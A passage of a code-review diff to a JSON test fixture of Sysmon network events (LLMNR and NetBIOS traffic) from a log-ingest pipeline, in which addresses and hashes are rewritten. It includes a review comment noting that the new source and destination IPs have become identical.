Name='DestinationIp'\u003eff02:0:0:0:0:0:1:3\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -8689,15 +8600,15 @@ }, "destination": { "port": 5355, - "ip": "e000:fc:4300:6800:7200:6f00:6d00:6500" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { "port": 55542, - "ip": "a00:20f:0:0:18a2:6e00:e0:ffff" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "network": { "protocol": "llmnr", - "community_id": "1:sejGGvgk92xTvKdzlFitndKqdWw=", + "community_id": "1:zjVE29ipqvMTvzEUbTYQ6tGBM08=", "transport": "udp", "type": "ipv6", "direction": "egress" 
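Review bot: In hunk `@@ -8689` both `destination.ip` and `source.ip` become the same address `2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6`, so the LLMNR event now describes a host talking to itself and `network.community_id` is derived from identical endpoints; the same collapse onto `89.160.20.156` happens in `@@ -8767`, `@@ -8845` and `@@ -9003`. This removes the fixture's check that the pipeline keeps source and destination apart (the egress/ingress pair at `@@ -8767`/`@@ -8845` now differs only in `direction`) and shrinks `related.ip` to a single element in the hunks that follow. For the NetBIOS events the original `169.254.255.255` was a link-local broadcast destination, so the rewritten sample also reads as name-service traffic to a routable address, which is not what the raw event represents. If the supported subset offers more than one address per family, use different ones for the two endpoints and regenerate; otherwise a sentence in the PR description noting that the endpoint duplication is intentional would help the next reader.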
@@ -8711,14 +8622,13 @@ "NETWORK SERVICE" ], "ip": [ - "a00:20f:0:0:18a2:6e00:e0:ffff", - "e000:fc:4300:6800:7200:6f00:6d00:6500" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313847755Z", + "ingested": "2021-12-09T13:49:44.739507200Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e15\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea00:20f:0:0:18a2:6e00:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData 
Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ee000:fc:4300:6800:7200:6f00:6d00:6500\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e15\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData 
Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -8767,15 +8677,15 @@ }, "destination": { "port": 137, - "ip": "169.254.255.255" + "ip": "89.160.20.156" }, "source": { "port": 137, - "ip": "169.254.180.25" + "ip": "89.160.20.156" }, "network": { "protocol": "netbios-ns", - "community_id": "1:yP71IXofOTWmF1LG760//yXa4Rk=", + "community_id": "1:fbQ9BbXiy01VWluiIQp2GM9FUAU=", "transport": "udp", "type": "ipv4", "direction": "egress" 
@@ -8789,14 +8699,13 @@ "SYSTEM" ], "ip": [ - "169.254.180.25", - "169.254.255.255" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313849316Z", + "ingested": "2021-12-09T13:49:44.739513Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e16\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData 
Name='DestinationIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e16\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -8845,15 +8754,15 @@ }, "destination": { "port": 137, - "ip": "169.254.180.25" + "ip": "89.160.20.156" }, "source": { "port": 137, - "ip": "169.254.255.255" + "ip": "89.160.20.156" }, "network": { "protocol": "netbios-ns", - "community_id": "1:yP71IXofOTWmF1LG760//yXa4Rk=", + "community_id": "1:fbQ9BbXiy01VWluiIQp2GM9FUAU=", "transport": "udp", "type": "ipv4", "direction": "ingress" 
@@ -8867,14 +8776,13 @@ "SYSTEM" ], "ip": [ - "169.254.255.255", - "169.254.180.25" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313850779Z", + "ingested": "2021-12-09T13:49:44.739516600Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e17\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData 
Name='DestinationIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e17\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", 
@@ -8951,7 +8859,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313852225Z", + "ingested": "2021-12-09T13:49:44.739520400Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e18\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003efe80:0:0:0:616f:32fa:b04f:b419\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003eff02:0:0:0:0:0:1:3\u003c/Data\u003e\u003cData 
Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -9003,15 +8911,15 @@ }, "destination": { "port": 5355, - "ip": "e000:fc:0:0:0:0:0:0" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { "port": 55717, - "ip": "a9fe:b419:0:0:f880:2301:e0:ffff" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "network": { "protocol": "llmnr", - "community_id": "1:SHkoHfPFDYWai8qQBwIiRxvCPZw=", + "community_id": "1:CbJTXAoYGQFCeKHghMVMZBaSXX0=", "transport": "udp", "type": "ipv6", "direction": "egress" 
@@ -9025,14 +8933,13 @@ "NETWORK SERVICE" ], "ip": [ - "a9fe:b419:0:0:f880:2301:e0:ffff", - "e000:fc:0:0:0:0:0:0" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313853653Z", + "ingested": "2021-12-09T13:49:44.739523800Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e19\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea9fe:b419:0:0:f880:2301:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ee000:fc:0:0:0:0:0:0\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e19\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData 
Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -9081,7 +8988,7 @@ }, "destination": { "port": 137, - "ip": "40.77.226.250" + "ip": "89.160.20.156" }, "source": { "port": 137, @@ -9090,7 +8997,7 @@ }, "network": { "protocol": "netbios-ns", - "community_id": "1:DI+g4BImhWaUwPmLEjdMMQVYPLs=", + "community_id": "1:W+rKY9g2gw/4oKxs1Chg32lzBig=", "transport": "udp", "type": "ipv4", "direction": "egress" 
@@ -9105,16 +9012,16 @@ ], "ip": [ "10.0.2.15", - "40.77.226.250" + "89.160.20.156" ] }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-10-14T04:10:32.313856820Z", + "ingested": "2021-12-09T13:49:44.739528500Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.264\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData 
